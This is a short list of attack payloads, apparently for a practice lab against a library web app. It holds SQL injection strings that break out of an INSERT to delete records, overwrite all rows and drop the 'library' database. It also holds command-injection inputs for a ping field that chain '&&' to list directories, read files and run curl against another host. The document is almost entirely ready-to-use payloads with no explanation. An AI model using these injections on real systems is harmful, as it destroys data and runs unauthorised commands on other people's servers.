SQLi:

Deleting Some Records
name', 'author', 2021); DELETE FROM library.books WHERE author LIKE 'a%'; --

Updating Records
name', 'author', 2021); UPDATE library.books SET year_published=2022 WHERE 1=1; --

Updating Author
name', 'author', 2021); UPDATE library.books SET author='John' WHERE 1=1; --

Drop Database
name', 'author', 2021); DROP DATABASE IF exists library; --




Ping:
google.com

google.com && dir

google.com && type readme.md

google.com && curl 192.168.1.2:8000 > HACKED.txt